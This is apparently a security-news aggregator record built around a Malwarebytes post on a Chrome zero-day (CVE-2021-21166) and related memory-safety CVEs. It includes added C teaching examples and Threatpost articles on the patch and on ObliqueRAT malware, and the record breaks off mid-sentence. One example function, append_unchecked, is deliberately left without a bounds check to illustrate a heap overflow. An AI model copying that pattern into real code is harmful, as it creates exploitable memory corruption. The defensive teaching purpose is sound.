ID MALWAREBYTES:07CCE98B638067D2F0F9AD53E87E8D55 Type malwarebytes Reporter Pieter Arntz Modified 2021-03-04T13:24:38
Description
The Microsoft Browser Vulnerability Research team has found and reported a vulnerability in the audio component of Google Chrome. Google has fixed this high-severity vulnerability (CVE-2021-21166) in its Chrome browser and is warning Chrome users that an exploit exists in the wild for the vulnerability. It is not the first time that Chrome's audio component was targeted by an exploit.
No details available
Further details about the vulnerability are restricted until a majority of Chrome users have updated to the patched version of the software. What we do know is that it concerns an object lifecycle issue in the audio component of the browser.
An object lifecycle is used in object oriented programming to describe the time between an object's creation and its destruction. Outside of the lifecycle the object is no longer valid, which could lead to a vulnerability.
For example, if everything goes as planned with the lifecycle, the correct amount of computer memory is allocated and reclaimed at the right times. If it doesn't go well and memory is mismanaged, that can lead to a flaw, or vulnerability, in the program.
More vulnerabilities patched in the update
As usual, Google patched several other vulnerabilities and bugs in the same update. Some of the other vulnerabilities were listed with high severity:
Google said that it fixed three heap-buffer overflow flaws in the TabStrip (CVE-2021-21159, CVE-2021-21161) and WebAudio (CVE-2021-21160) components. A high-severity use-after-free error (CVE-2021-21162) was found in WebRTC. Two other high-severity flaws include an insufficient data validation issue in Reader Mode (CVE-2021-21163) and an insufficient data validation issue in Chrome for iOS (CVE-2021-21164).
The CVEs
Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).
CVE-2021-21159, CVE-2021-21161: Heap buffer overflow in TabStrip. The heap is the region of a process's memory used to store dynamically allocated data. A buffer overflow is a type of software vulnerability that exists when a write to an area of memory runs past that area's boundary and into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap.
CVE-2021-21160: Heap buffer overflow in WebAudio.
CVE-2021-21162: Use after free in WebRTC. Use after free (UAF) is a vulnerability caused by incorrect use of dynamic memory during a program's operation. If, after freeing a memory location, a program does not clear the pointer to that memory and later uses it, an attacker can use the error to manipulate the program. WebRTC allows programmers to add real-time communication capabilities to their applications.
CVE-2021-21163: Insufficient data validation in Reader Mode. Insufficient data validation could allow an attacker to use specially crafted input to manipulate a program.
CVE-2021-21164: Insufficient data validation in Chrome for iOS.
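To make the heap buffer overflow class listed above concrete, here is an added C example written for this page (it is not code from the Malwarebytes post or from Chromium, and the sample_buf type and its function names are invented): a fixed-capacity buffer on the heap, the append routine that trusts the caller's length and can write past the end of the block, and the bounds-checked version that refuses the write.

```c
/* Added example for this page (not code from the Malwarebytes post or from
 * Chromium): a fixed-capacity heap buffer, the append that can overflow it,
 * and the bounds check that prevents the overflow. sample_buf and the
 * function names are illustrative. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
    size_t capacity;        /* bytes allocated for data */
    size_t length;          /* bytes in use; invariant: length <= capacity */
    unsigned char *data;    /* heap block; whatever malloc placed after it
                               is the "adjacent memory region" an overflow
                               would corrupt */
} sample_buf;

sample_buf *sample_buf_new(size_t capacity) {
    sample_buf *b = malloc(sizeof *b);
    if (!b) return NULL;
    b->data = malloc(capacity);
    if (!b->data) { free(b); return NULL; }
    b->capacity = capacity;
    b->length = 0;
    return b;
}

void sample_buf_free(sample_buf *b) {
    if (!b) return;
    free(b->data);
    free(b);
}

/* VULNERABLE: trusts src_len. When src_len exceeds the remaining capacity,
 * memcpy keeps writing past the end of data into the neighbouring heap
 * chunk. Left in for comparison only; nothing in this file calls it. */
void append_unchecked(sample_buf *b, const unsigned char *src, size_t src_len) {
    memcpy(b->data + b->length, src, src_len);
    b->length += src_len;
}

/* FIXED: compare against the remaining space before touching memory and
 * refuse the write instead of truncating silently. Because length <=
 * capacity always holds, capacity - length cannot underflow; the check is
 * deliberately not written as length + src_len > capacity, which can wrap
 * around for a huge src_len and pass. Returns 0 on success, -1 if the
 * write would overflow. */
int append_checked(sample_buf *b, const unsigned char *src, size_t src_len) {
    if (!b || src_len > b->capacity - b->length)
        return -1;
    memcpy(b->data + b->length, src, src_len);
    b->length += src_len;
    return 0;
}

int main(void) {
    sample_buf *b = sample_buf_new(16);
    if (!b) return 1;
    const unsigned char chunk[10] = "012345678";          /* 9 chars + NUL */
    int first  = append_checked(b, chunk, sizeof chunk);  /* fits: 0 */
    int second = append_checked(b, chunk, sizeof chunk);  /* 10 > 6 left: -1 */
    printf("first=%d second=%d length=%zu\n", first, second, b->length);
    sample_buf_free(b);
    return (first == 0 && second == -1) ? 0 : 1;
}
```

The point of the fix is where the comparison happens: the remaining space is computed from the object's own bookkeeping before any memory is written, and an oversized request is reported back to the caller rather than clipped, so the error cannot pass unnoticed.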
When more details about the vulnerabilities come to light, it's possible that more exploits for them will be found in the wild. That depends a lot on how easy they are to abuse and how big the possible impact can be. But with one already being used in the wild, it is advisable to update now.
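The object lifecycle issue behind CVE-2021-21166 and the use-after-free entry for WebRTC above describe the same family of mistake. As an added C example written for this page (not code from the Malwarebytes post or from Chromium; the audio_node type and its functions are illustrative), the following tracks an object's lifetime with a reference count: the bug appears when a second user of the object is not counted as an owner, and the fix is that every user holds a reference and gives it back through a release function that also clears the caller's pointer.

```c
/* Added example, not code from the Malwarebytes post or from Chromium:
 * an object lifecycle managed by reference counting, and the
 * use-after-free that results when a user of the object is not counted
 * as an owner. Names (audio_node etc.) are illustrative. */
#include <stdlib.h>

typedef struct {
    int refs;         /* how many owners currently hold this object */
    int sample_rate;
} audio_node;

/* Creation: the object starts its lifecycle with one owner, the creator. */
audio_node *node_create(int sample_rate) {
    audio_node *n = malloc(sizeof *n);
    if (!n) return NULL;
    n->refs = 1;
    n->sample_rate = sample_rate;
    return n;
}

/* Every additional user takes a reference, so the object cannot reach the
 * end of its lifecycle while anyone still uses it. */
audio_node *node_retain(audio_node *n) {
    if (n) n->refs++;
    return n;
}

/* Release: drop one reference, destroy on the last one, and clear the
 * caller's pointer so a stale copy cannot be dereferenced by accident. */
void node_release(audio_node **np) {
    if (!np || !*np) return;
    if (--(*np)->refs == 0)
        free(*np);
    *np = NULL;
}

/* THE BUG (shown as a comment so this file stays free of undefined
 * behaviour): a second user aliases the pointer without retaining, the
 * creator releases, and the alias now points at freed memory.
 *
 *   audio_node *producer = node_create(48000);
 *   audio_node *consumer = producer;      // no node_retain(): not counted
 *   node_release(&producer);              // refs 1 -> 0: object freed
 *   return consumer->sample_rate;         // use after free
 */

/* THE FIX: every user is an owner; the object outlives the last release. */
int rate_with_refcount(void) {
    audio_node *producer = node_create(48000);
    audio_node *consumer = node_retain(producer);       /* refs 1 -> 2 */
    node_release(&producer);        /* refs 2 -> 1; producer is now NULL */
    int rate = consumer ? consumer->sample_rate : -1;   /* still live */
    node_release(&consumer);        /* refs 1 -> 0; freed; consumer NULL */
    return rate;
}

/* The cleared pointer turns a silent dangling read into a detectable NULL. */
int released_pointer_is_cleared(void) {
    audio_node *n = node_create(44100);
    node_release(&n);
    return n == NULL;
}

int main(void) {
    return (rate_with_refcount() == 48000 && released_pointer_is_cleared()) ? 0 : 1;
}
```

Clearing the pointer on release is the step the post names; on its own it only protects the copy that was passed to node_release, which is why the counted ownership matters: the alias that was never retained is exactly the copy nobody clears.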
How to update
The easiest way to do it is to let Chrome update automatically, which uses the same method I outline below but does not require your attention. But you can end up lagging behind if you never close the browser, or if something goes wrong, such as an extension stopping you from updating the browser.
So, it doesn’t hurt to check now and then. And now would be a good time.
My preferred method is to have Chrome open the page chrome://settings/help, which you can also find by clicking Settings > About Chrome.
If there is an update available, Chrome will notify you and start downloading it. Then it will tell you that all you have to do to complete the update is Relaunch the browser.
After the update your version should be 89.0.4389.72 or later.
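An added example, not part of the original post: a small C program that compares an installed Chrome version string against the patched release named above, the way an inventory or compliance check would. The function names are invented; the only fact taken from the page is the patched version 89.0.4389.72.

```c
/* Added example for this page (not from the Malwarebytes post): compare an
 * installed Chrome version string with the release that carries the fix.
 * version_cmp / chrome_is_patched are illustrative names. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The release the post says you should be on or above. */
#define PATCHED_VERSION "89.0.4389.72"

/* Read one dotted component from *p and advance past the following '.'.
 * An exhausted string yields 0, so "89.0" compares equal to "89.0.0.0".
 * A non-numeric remainder is treated as the end of the string. */
static unsigned long next_component(const char **p) {
    char *end;
    unsigned long v;
    if (**p == '\0') return 0;
    v = strtoul(*p, &end, 10);
    if (end == *p) {              /* no digits: stop parsing this string */
        *p += strlen(*p);
        return 0;
    }
    *p = (*end == '.') ? end + 1 : end;
    return v;
}

/* Component-wise numeric comparison: <0 if a < b, 0 if equal, >0 if a > b.
 * Plain strcmp would be wrong here: "89.0.4389.72" sorts before "9.0"
 * as text, yet is the far newer release. */
int version_cmp(const char *a, const char *b) {
    while (*a != '\0' || *b != '\0') {
        unsigned long x = next_component(&a);
        unsigned long y = next_component(&b);
        if (x != y) return x < y ? -1 : 1;
    }
    return 0;
}

/* 1 if the installed version is at or above the patched release, else 0. */
int chrome_is_patched(const char *installed) {
    return version_cmp(installed, PATCHED_VERSION) >= 0;
}

int main(int argc, char **argv) {
    const char *installed = argc > 1 ? argv[1] : PATCHED_VERSION;
    int ok = chrome_is_patched(installed);
    printf("installed %s: %s\n", installed, ok ? "patched" : "UPDATE NEEDED");
    return ok ? 0 : 2;
}
```

Pass the bare version number as the first argument; on Linux, `google-chrome --version` prints "Google Chrome" followed by the number, so the last whitespace-separated field is what to feed in. A non-zero exit status means the browser is still below the patched release.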
{"id": "MALWAREBYTES:07CCE98B638067D2F0F9AD53E87E8D55", "type": "malwarebytes", "bulletinFamily": "blog", "title": "Update now! Chrome fix patches in-the-wild zero-day", "description": "The Microsoft Browser Vulnerability Research team has found and reported a vulnerability in the audio component of Google Chrome. Google has fixed this high-severity vulnerability ([CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>)) in its Chrome browser and is warning Chrome users that an exploit exists in the wild for the vulnerability. It is [not the first time](<https://www.tenable.com/blog/cve-2019-13720-use-after-free-zero-day-in-google-chrome-exploited-in-the-wild>) that Chrome's audio component was targeted by an exploit.\n\n### No details available\n\nFurther details about the vulnerability are restricted until a majority of Chrome users have updated to the patched version of the software. What we do know is that it concerns an object lifecycle issue in the audio component of the browser.\n\nAn object lifecycle is used in object oriented programming to describe the time between an object's creation and its destruction. Outside of the lifecycle the object is no longer valid, which could lead to a vulnerability.\n\nFor example, if everything goes as planned with the lifecycle the correct amount of computer memory is allocated and reclaimed at the right times. If it doesn't go well, and memory is mismanaged, that could lead to a flaw \u2013 or vulnerability - in the program.\n\n### More vulnerabilities patched in the update\n\nAs per usual Google patched several other vulnerabilities and bugs in the same update. 
Some of the other vulnerabilities were listed with high severity:\n\nGoogle said that it fixed three heap-buffer overflow flaws in the TabStrip ([CVE-2021-21159](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21159>), [CVE-2021-21161](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21161>)) and WebAudio ([CVE-2021-21160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21160>)) components. A high-severity use-after-free error ([CVE-2021-21162](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21162>)) was found in WebRTC. Two other high-severity flaws include an insufficient data validation issue in Reader Mode ([CVE-2021-21163](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21163>)) and an insufficient data validation issue in Chrome for iOS ([CVE-2021-21164](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-21164>)).\n\n### The CVE\u2019s\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\n * CVE-2021-21159, CVE-2021-21161: Heap buffer overflow in TabStrip. Heap is the name for a region of a process\u2019 memory which is used to store dynamic variables. A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap.\n * CVE-2021-21160: Heap buffer overflow in WebAudio.\n * CVE-2021-21162: Use after free in WebRTC. Use after free (UAF) is a vulnerability due to incorrect use of dynamic memory during a program\u2019s operation. If after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. 
WebRTC allows programmers to add real-time communication capabilities to their application.\n * CVE-2021-21163: Insufficient data validation in Reader Mode. Insufficient data validation could allow an attacker to use especially crafted input to manipulate a program.\n * CVE-2021-21164: Insufficient data validation in Chrome for iOS.\n\nWhen more details about the vulnerabilities come to light it's possible that more exploits for them will be found in the wild. It depends a lot on how easy they are to abuse, and how big the possible impact can be. But with one already being used in the wild, it is advisable to update now. \n\n### How to update\n\nThe easiest way to do it is to allow Chrome to update automatically, which basically uses the same method I outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.\n\nSo, it doesn\u2019t hurt to check now and then. And now would be a good time.\n\nMy preferred method is to have Chrome open the page **chrome://settings/help** which you can also find by clicking **Settings > About Chrome**.\n\nIf there is an update available, Chrome will notify you and start downloading it. Then it will tell you all you have to do to complete the update is **Relaunch** the browser.\n\n_After the update your version should be at 89.0.4.4389.72 or later_\n\nStay safe, everyone!\n\nThe post [Update now! 
Chrome fix patches in-the-wild zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/update-now-chrome-fix-patches-in-the-wild-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "published": "2021-03-04T13:24:38", "modified": "2021-03-04T13:24:38", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/update-now-chrome-fix-patches-in-the-wild-zero-day/", "reporter": "Pieter Arntz", "references": [], "cvelist": ["CVE-2019-13720", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21166"], "lastseen": "2021-03-04T14:27:39", "viewCount": 199, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:C5336A4C-EEE0-4EA3-AD28-85F0EF3F0F75", "AKB:DFA61FBF-688B-44E9-8B09-134E93207AD9", "AKB:3609E46B-E023-474D-B14A-026E01AF8EA9", "AKB:C300BC5A-FE8F-4274-AFA8-C1F47411FEC1"]}, {"type": "threatpost", "idList": ["THREATPOST:CF9E25BD324C5940B0795721CA134155", "THREATPOST:74F8E9B3D3CB64CAF2AF0B54DE29C9A6", "THREATPOST:6F7E512F15913694CF17A906715FE678", "THREATPOST:230DF95E70EB9C4F372C198798822D19", "THREATPOST:A8D4979B3A84B8E7B98B5321FA948454", "THREATPOST:DF87733B74489628AB9F2C89704380A9"]}, {"type": "cve", "idList": ["CVE-2019-13720", "CVE-2021-21163", "CVE-2021-21159", "CVE-2021-21164", "CVE-2021-21160", "CVE-2021-21162", "CVE-2021-21161", "CVE-2021-21166"]}, {"type": "mscve", "idList": ["MS:CVE-2021-21161", "MS:CVE-2021-21164", "MS:CVE-2021-21159", "MS:CVE-2021-21162", "MS:CVE-2021-21160", "MS:CVE-2021-21163", "MS:CVE-2021-21166"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/FREEBSD-CVE-2021-21159/"]}, {"type": "securelist", "idList": ["SECURELIST:B3F6FE1E8EA0830B8B1306E79A2E63EA", "SECURELIST:4F6413DE862444B5FA0B192AF22A042D", "SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C", "SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7", 
"SECURELIST:5CA08A4E968A3A57A891B8DC568EBF97"]}, {"type": "nessus", "idList": ["OPENSUSE-2019-2664.NASL", "DEBIAN_DSA-4886.NASL", "OPENSUSE-2021-392.NASL", "MACOSX_GOOGLE_CHROME_89_0_4389_72.NASL", "FREEBSD_PKG_F00B65D87CCB11EBB3BEE09467587C17.NASL", "GOOGLE_CHROME_89_0_4389_72.NASL", "GENTOO_GLSA-202004-04.NASL", "MACOSX_GOOGLE_CHROME_78_0_3904_87.NASL", "MICROSOFT_EDGE_CHROMIUM_89_0_774_45.NASL", "FEDORA_2021-C88A96BD4B.NASL"]}, {"type": "fedora", "idList": ["FEDORA:3608E6051CC4", "FEDORA:2B88A6092506", "FEDORA:BF4FC30A0346", "FEDORA:A017F3074280", "FEDORA:AC09F608BFF0", "FEDORA:C67773052A4D"]}, {"type": "freebsd", "idList": ["F00B65D8-7CCB-11EB-B3BE-E09467587C17"]}, {"type": "thn", "idList": ["THN:9C73175440CD28F1BCB5707C48282690", "THN:EF50BA60FF5E3EF9AF1570FF5A2589A0", "THN:F197A729A4F49F957F9D5910875EBAAA", "THN:15BF409706D7240A5276C705732D745F"]}, {"type": "archlinux", "idList": ["ASA-201911-7", "ASA-201911-1", "ASA-201911-2", "ASA-202103-19"]}, {"type": "cisa", "idList": ["CISA:809811C28F231C547A37018C8189C268"]}, {"type": "talosblog", "idList": ["TALOSBLOG:1789DE47001AAA9B14B2D2EC65C18C6A"]}, {"type": "gentoo", "idList": ["GLSA-202004-04"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4886-1:0EF07", "DEBIAN:DSA-4562-1:58850"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2426-1", "OPENSUSE-SU-2019:2447-1", "OPENSUSE-SU-2019:2421-1", "OPENSUSE-SU-2019:2427-1", "OPENSUSE-SU-2019:2664-1"]}, {"type": "redhat", "idList": ["RHSA-2019:3775"]}, {"type": "kaspersky", "idList": ["KLA11601", "KLA11716"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877259", "OPENVAS:1361412562310815823", "OPENVAS:1361412562310815825", "OPENVAS:1361412562310852760", "OPENVAS:1361412562310704562", "OPENVAS:1361412562310877015", "OPENVAS:1361412562310877007", "OPENVAS:1361412562310815824"]}, {"type": "krebs", "idList": ["KREBS:F5ECCD2DD57FDBC0A6062FA0AB5371FB"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:4C8E7D595A367E9DA6260DA13FAF3886", 
"GOOGLEPROJECTZERO:C2A64C2133DFD2ACB457C2DD2790CBF7", "GOOGLEPROJECTZERO:2E85097DC4FBE492B1CB6FAE84AFE126"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-03-04T14:27:39", "rev": 2}, "score": {"value": 5.5, "vector": "NONE", "modified": "2021-03-04T14:27:39", "rev": 2}, "vulnersScore": 5.5}, "immutableFields": []}
{"threatpost": [{"lastseen": "2021-03-04T21:58:01", "bulletinFamily": "info", "cvelist": ["CVE-2020-15995", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166"], "description": "Google has fixed a high-severity vulnerability in its Chrome browser and is warning Chrome users that an exploit exists in the wild for the flaw.\n\nThe vulnerability is one of 47 security fixes that the tech giant rolled out on Tuesday in Chrome 89.0.4389.72, including patches for eight high-severity flaws.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe Chrome team is delighted to announce the promotion of Chrome 89 to the stable channel for Windows, Mac and Linux,\u201d according to Google [on Tuesday](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html>). \u201cThis will roll out over the coming days/weeks.\u201d\n\n## Google Chrome: Actively-Exploited Security Flaw\n\nThe actively-exploited vulnerability in question (CVE-2021-21166) stems from the audio component of the browser (which [has previously been found](<https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>) to have various security issues in the past). According to Google, the flaw stems from an object lifecycle issue. The object lifecycle is the duration in which a programming language object is valid for use \u2013 between the time it is created and destroyed.\n\nBeyond Google noting that it \u201cis aware of reports that an exploit for CVE-2021-21166 exists in the wild,\u201d further information about the glitch is unavailable. That\u2019s because \u201caccess to bug details and links may be kept restricted until a majority of users are updated with a fix,\u201d according to Google.\n\nThe flaw was reported by Alison Huffman, with the Microsoft Browser Vulnerability Research team, on Feb. 11. 
Huffman reported another high-severity flaw that Google fixed in Chrome, which also stemmed from an object lifecycle issue in the audio component (CVE-2021-21165).\n\n## Other Chrome Security High-Severity Flaws\n\nDetails around the other high-severity vulnerabilities patched by Google in Chrome remain scant. However, Google said that it fixed three heap-buffer overflow flaws in the TabStrip (CVE-2021-21159, CVE-2021-21161) and WebAudio (CVE-2021-21160) components. A high-severity use-after-free error (CVE-2021-21162) was found in WebRTC.\n\nTwo other high-severity flaws include an insufficient data validation issue in Reader Mode (CVE-2021-21163) and an insufficient data validation issue in Chrome for iOS (CVE-2021-21164).\n\n## **Google Chrome Security Updates**\n\nChrome will in many cases update to its newest version automatically, however security experts suggest that users double check that this has happened. To check if an update is available:\n\n * Google Chrome users can go to chrome://settings/help by clicking Settings > About Chrome\n * If an update is available Chrome will notify users and then start the download process\n * Users can then relaunch the browser to complete the update\n\nThe fixes come after Google in February [warned of a zero-day vulnerability](<https://threatpost.com/google-chrome-zero-day-windows-mac/163688/>) in its V8 open-source web engine that\u2019s being actively exploited by attackers. In January, the Cybersecurity and Infrastructure Security Agency (CISA) [urged Windows, macOS and Linux users](<https://threatpost.com/firefox-chrome-edge-bugs-system-hijacking/162873/>) of Google\u2019s Chrome browser to patch an out-of-bounds write bug (CVE-2020-15995) impacting the current 87.0.4280.141 version of the software.\n\nAnd in December, Google updated Chrome to fix four bugs with a severity rating of \u201chigh\u201d and eight overall. 
[Three were use-after-free flaws](<https://threatpost.com/google_chrome_bugs_patched/161907/>), which could allow an adversary to generate an error in the browser\u2019s memory, opening the door to a browser hack and host computer compromise.\n", "modified": "2021-03-03T21:17:14", "published": "2021-03-03T21:17:14", "id": "THREATPOST:A8D4979B3A84B8E7B98B5321FA948454", "href": "https://threatpost.com/google-patches-actively-exploited-flaw-in-chrome-browser/164468/", "type": "threatpost", "title": "Google Patches Actively Exploited Flaw in Chrome Browser", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-03T22:09:38", "bulletinFamily": "info", "cvelist": ["CVE-2021-21166"], "description": "The ObliqueRAT malware is now cloaking its payloads as seemingly-innocent image files that are hidden on compromised websites.\n\nThe remote access trojan (RAT), which has been operating since 2019, spreads via emails, which have malicious Microsoft Office documents attached. Previously, payloads were embedded into the documents themselves. Now, if users click on the attachment, they\u2019re redirected to malicious URLs where the payloads are hidden with steganography.\n\nResearchers warn that this new tactic has been seen helping ObliqueRAT operators to avoid detection during the malware\u2019s targeting of various organizations in South Asia \u2014 where the goal is to ultimately sends victims an email with malicious Microsoft Office documents, which, once clicked, fetch the payloads and ultimately exfiltrate various data from the victim.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis new campaign is a typical example of how adversaries react to attack disclosures and evolve their infection chains to evade detections,\u201d said Asheer Malhotra, researcher with Cisco Talos, [on Tuesday](<https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html>). 
\u201cModifications in the ObliqueRAT payloads also highlight the usage of obfuscation techniques that can be used to evade traditional signature-based detection mechanisms.\u201d\n\n## **What is the ObliqueRAT Malware?**\n\n[The known activity for ObliqueRAT](<https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html>) dates back to November 2019, part of a campaign targeting entities in Southeast Asia and uncovered by Cisco Talos researchers in February 2020. ObliqueRAT operators have always used emails with malicious attachments as an initial infection vector. Generally the infection chain uses an initial executable, which acts as a dropper for ObliqueRAT itself.\n\nOnce it infected systems, ObliqueRAT exfiltrates various information, including system data, a list of drives and a list of running processes.\n\n## **ObliqueRAT Malware Evolution**\n\nThe newly discovered ObliqueRAT attack chain was part of a campaign that started in May last year \u2013 but which was only recently uncovered by researchers. In addition to the use of URL redirects, the payloads themselves have also been given an update, now consisting of seemingly benign bitmap image files (BMP).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/02102115/ObliqueRAT-Payloads.png>)\n\nThe new attack chain used by ObliqueRAT. Credit: Cisco Talos\n\nThe image files contain both legitimate image data and malicious executable bytes concealed in the image data, said researchers. Threatpost has reached out to Cisco Talos for further information on the compromised websites and the images used as part of the attack.\n\nThis is a well-known tactic used by [threat actors, called steganography](<https://threatpost.com/steganography-pinpoint-attacks-industrial-targets/156151/>). Attackers hide malware in image files as a way to circumvent detection. 
That\u2019s because many filters and gateways [let image file formats pass without too much scrutiny](<https://threatpost.com/rare-steganography-hack-can-compromise-fully-patched-websites/146701/>).\n\nThe initial email sent to victims contains malicious documents with new macros, which redirect users to the malicious URLs containing these payloads. The malicious macros consequently download the BMP files, and the ObliqueRAT payload is extracted to the disk.\n\nThere are slight variations that have been seen in real-world attacks. One instance of a malicious document that researchers found \u201cuses a similar technique, with the difference being that the payload hosted on the compromised website is a BMP image containing a .ZIP file that contains ObliqueRAT payload,\u201d said Malhotra. \u201cThe malicious macros are responsible for extracting the .ZIP and subsequently the ObliqueRAT payload on the endpoint.\u201d\n\nDuring the course of their investigation, researchers also discovered three previously used but never-before-seen payloads for ObliqueRAT, which showed how the malware authors have made changes over time. For instance, one of the versions created in September added new file enumeration and stealing capabilities, as well as expanded the payload\u2019s functionalities to include the ability to take webcam and desktop screenshots and recordings.\n\n## **ObliqueRAT: Hiding From Detection, Improved Persistence**\n\nThis updated payload delivery technique gives attackers a leg up in sidestepping detection, said researchers.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/02102156/ObliqueRAT-Payloads-2.png>)\n\nThe evolution of ObliqueRAT\u2019s payloads. Credit: Cisco Talos\n\n\u201cIt is highly likely that these changes are in response to previous disclosures to achieve evasion for these new campaigns,\u201d they said. 
\u201cThe usage of compromised websites is another attempt at detection evasion.\u201d\n\nThe macros also have adopted a new tactic for achieving reboot persistence for the ObliqueRAT payloads. This is accomplished by creating a shortcut (.URL file extension) in the infected user\u2019s Startup directory, said researchers. Once the computer reboots, the payloads will then still be able to run.\n\n## **RevengeRAT: Researchers Link With \u2018Low Confidence\u2019**\n\nResearchers said that they observed overlaps in the command-and-control (C2) server infrastructure between ObliqueRAT and a RevengeRAT campaign. However, they only made the connection with \u201clow confidence\u201d due to lack of any other more substantial evidence.\n\nRevengeRAT is a [commodity malware family](<https://threatpost.com/malware-dropper-dual-rats/150271/>) that [has been used](<https://threatpost.com/iranian-apt33-shakes-up-cyberespionage-tactics/146041/>) by Iran-linked, espionage-focused [threat group APT33](<https://threatpost.com/apt33-mounts-targeted-botnet-attacks-us/150248/>) in the past. The RAT collects and exfiltrates information from the victim\u2019s system.\n\nPreviously, researchers also made links between ObliqueRAT and Crimson RAT. The functionalities of Crimson RAT [include stealing credentials](<https://threatpost.com/apt36-taps-coronavirus-as-golden-opportunity-to-spread-crimson-rat/153776/>) from victims\u2019 browsers, capturing screenshots, collecting antivirus software information, and listing the running processes, drives and directories from victim machines. Researchers said that the two RATs shared \u201csimilar maldocs and macros\u201d in previous ObliqueRAT campaigns.\n\n\u201cThis malware has links to the Transparent Tribe group that has historically targeted entities in South Asia,\u201d Malhotra told Threatpost. \u201cAs is the case with most suspected APT campaigns, this campaign is also low volume. 
A low-volume campaign has better chances of remaining undiscovered for longer periods of time thus increasing the chances of success for the attackers.\u201d\n", "modified": "2021-03-02T17:06:51", "published": "2021-03-02T17:06:51", "id": "THREATPOST:CF9E25BD324C5940B0795721CA134155", "href": "https://threatpost.com/website-images-obliquerat-malware/164395/", "type": "threatpost", "title": "Compromised Website Images Camouflage ObliqueRAT Malware", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-04-24T20:49:12", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "As the COVID-19 pandemic continues to force in-person cybersecurity event cancellations, Kaspersky is forging ahead with a virtual security summit, SAS@home.\n\nTopics on [the agenda](<https://thesascon.com/SAS@home>) include threat intel on advanced persistent threats (APTs), new vulnerability research, and topics related to a post-crisis world \u2013 such as how the industry is changing because of the pandemic.\n\nThe online conference, scheduled for April 28-30, is meant to complement the firm\u2019s annual Security Analyst Summit (SAS). The in-person SAS event was originally scheduled for April in Barcelona, and will now take place in November \u2013 with SAS@home providing an opportunity for community to come together and share insights and research in the meantime.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nExperts from across the IT security industry will present three days of knowledge sharing, [pecha-kucha moments](<https://www.pechakucha.com/>), \u201cfireside chats\u201d and Master Class training sessions. The sessions will be presented live, free to all participants via the ON24 webinar platform, with on-demand replays available after the fact. The event will run each day from 11 a.m. to 1 p.m. 
ET.\n\n\u201c[Attendees] will enjoy a unique opportunity to chat online and learn from some of the world\u2019s leading cybersecurity researchers and influencers in a welcoming atmosphere, while also taking a deep dive into a top-notch program of topical presentations typical for the regular SAS,\u201d Kaspersky said in a media statement.\n\nPresentations will cover new, unpublished research as well as the latest evolutions of known trends. For instance, \u201cHiding in Plain Sight: An APT Comes into a Market\u201d on Tuesday will feature Kaspersky researchers Alexey Firsh and Lev Pikman opening the kimono on previously undisclosed threat intelligence regarding a nation-state cybercriminal group.\n\nMeanwhile, \u201cZero-day Exploits of Operation WizardOpium,\u201d also on Tuesday, will feature Kaspersky researchers Anton Ivanov and Boris Larin offering a deep dive and new information regarding the weapons arsenal of a sophisticated threat group. The group shares characteristics with known APTs like DarkHotel and Lazarus Group \u2013 but have evaded any serious attribution attempts. WizardOpium attacks [were seen in November](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) using a zero-day for Google\u2019s Chrome browser (CVE-2019-13720) and [in December](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>) exploiting yet another to gain 